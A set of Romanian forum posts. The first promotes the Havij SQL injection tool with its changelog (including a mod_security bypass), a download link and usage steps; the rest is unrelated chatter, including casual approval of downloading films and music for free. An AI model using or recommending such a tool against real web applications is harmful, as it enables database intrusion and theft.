MsSQL added. * Time based method for MySQL added. * mod_security bypass added. * Pause button added. * Basic authentication added. * Digest authentication added. * Post Data field added. * Bugs related to the dot character in database names fixed. * Syntax overwriting when defined by the user in blind injections fixed. * MSSQL database detection from error when using the JDBC driver corrected. * Timeout bug in the md5 cracker fixed. * Default value bug fixed. * String encode bug fixed in PostgreSQL. * Injecting URL-rewrite pages added. * Injecting into any part of the HTTP request (Cookie, User-Agent, Referer, etc.) made available. * A bug in finding string columns fixed (especially for MySQL). * Finding column count in MySQL when the input value is non-effective added. * Window resize bug in custom DPI setting fixed. * Some bugs in finding row count fixed. * Getting the database name in MSSQL error-based mode when the injection type is guessed as integer but is actually string fixed.
Features: http://itsecteam.com/en/projects/project1.htm How to use This tool is for exploiting SQL Injection bugs in web applications. To use this tool you should know a little about SQL Injection. Enter the target URL, select the HTTP method, then click Analyze. Note: make sure the URL is valid input that returns a normal page, not a 404 or error page. Download: http://itsecteam.com/files/havij/Havij1.14Free.rar Hai baieti, fiti 1337 (script-kiddie...), aratati ca sunteti in stare sa folositi un program si vreau sa vad aere de mai hackeri la Show Off PS: Nu l-am incercat, nu stiu daca e infectat, dar cum il veti descarca de pe site-ul oficial cred ca nu este nici o problema.
-
Deocamdata nu am timp, o sa incep sesiunea, dar dupa sesiune o sa aloc mai mult timp pentru RST (daca nu ma angajez undeva) si treburile vor merge mai bine.
-
Si cam ce anume s-ar posta acolo? Ce ati posta de exemplu? Vreau niste exemple concrete. Ceva imi spune ca va fi cam pustie acea categorie.
-
Poate nu au poze clare cu acea galaxie si au vrut doar sa arate o imagine asemanatoare acelei galaxii. Ma refer la faptul ca este posibil sa aiba multe informatii despre acea galaxie, dar nu o fotografie concreta care sa fie relativ clara si care sa poata fi afisata publicului larg, astfel au creat acea imagine mai mult descriptiva a acelei fotografii.
-
Normal, stiri gen "Cancan", adica de 2 lei. Nici eu nu as vrea sa se inchida. Poti afla incredibil de multe informatii despre prieteni, despre cum gandesc, despre ce fac, tot felul de prostii.
-
Multumesc tuturor si la multi ani celorlalti membri care isi serbeaza azi ziua de nastere. Sa beti ceva si pentru mine, si eu o sa beau ceva pentru voi. romanu: Nu toti moderatorii/administratorii sunt Ioni PS: Ma puteti injura, critica etc. Nu ma supar, nu dau warn/ban. Hai, cat aveti ocazia :->
-
Haaa mersi boss, la multi ani si tie bre, sa ne traiesti. :-> Trebuie sa ne dam de baut unu altuia. Oricum inca trebuie sa iti dau 2 beri Mersi baieti. Azi nu dau banuri/warnuri
-
Sunt usoare, doar 9 e greu, trebuie sa faci Backtracking.
-
Warn tuturor. E treaba administratorilor si a moderatorilor asta. Ati facut offtopic toti
-
Toate sunt JavaScript. Nu sunt grele, trebuie doar putina imaginatie. Deocamdata sunt la nivelul 9, cred ca trec mai departe maine. http://www.telerie-effegibi.it/daniele/default.asp?lev=1 Bafta.
-
Windows? Nu, Linux. Si asta inseamna: nici un program piratat. Doar muzica (manele) mai descarc din cand in cand, si filme. De ce sa dau bani pe ceva cand pot avea gratis? E modul clasic si practic de a gandi.